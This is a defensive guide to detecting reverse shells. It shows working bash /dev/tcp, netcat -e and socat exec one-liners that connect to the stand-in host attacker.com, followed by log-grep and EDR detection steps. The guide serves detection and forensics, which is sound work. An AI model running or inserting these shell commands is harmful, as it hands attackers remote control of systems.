Reverse Shell

Reverse Shell Detection and Analysis
Reverse shells are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.
Common Commands and Their Usage
1. bash Command
The bash command can establish reverse shells by leveraging /dev/tcp
or /dev/udp
.
Example:
export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
Detection:
Audit Logs:
cat /var/log/audit/audit.log | grep "bash" | egrep "udp|tcp"
Command History:
history | grep "bash" | egrep "udp|tcp" cat ~/.bash_history | grep "bash" | egrep "udp|tcp"
EDR/XDR Logs: Monitor for bash process creation or network events involving
/dev/tcp
or/dev/udp
.
2. nc (Netcat) Command
Netcat is a versatile utility often used for reverse shells.
Example:
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
Detection:
Focus on
-e
or-l
parameters.Audit Logs:
cat /var/log/audit/audit.log | grep "nc" | grep "\-e"
Command History:
history | grep "nc" | grep "\-e" cat ~/.bash_history | grep "nc" | grep "\-e"
EDR/XDR Logs: Monitor nc process creation and check for unusual outbound connections.
3. socat Command
socat offers more flexibility than nc, making it a preferred choice for advanced reverse shells.
Example:
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
Detection:
Investigate commands using
exec
andtcp-connect
.Audit Logs:
cat /var/log/audit/audit.log | grep "socat" | grep -i "exec"
Command History:
history | grep "socat" | grep -i "exec" cat ~/.bash_history | grep "socat" | grep -i "exec"
EDR/XDR Logs: Analyze socat processes for suspicious parameters and unexpected network activity.
General Detection Strategies
1. Audit Logs
Continuously monitor /var/log/audit/audit.log
for specific commands and associated parameters:
Commands to Track:
bash
,nc
,socat
Example:
cat /var/log/audit/audit.log | grep [command]
2. Command History
Regularly inspect command history files for traces of suspicious commands:
Interactive Sessions:
history | grep [command]
Persistent Logs:
cat ~/.bash_history | grep [command]
3. EDR/XDR Solutions
Employ EDR or XDR tools to:
Track Process Creation: Identify the origin of reverse shell tools.
Analyze Network Activity: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.
4. Network Monitoring
Set up alerts for:
Unusual Outbound Connections: Look for high-frequency requests to external IPs.
Known Malicious Indicators: Monitor outbound traffic to flagged domains or IPs.
Key Takeaways
Reverse shells exploit legitimate utilities like bash, nc, and socat for remote control.
Detection relies on monitoring suspicious process creation, command execution, and network connections.
Forensic Analysis requires correlating data from:
Audit logs (
/var/log/audit/audit.log
).Command histories (
history
or.bash_history
).EDR/XDR telemetry for process and network activity.
By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.
Last updated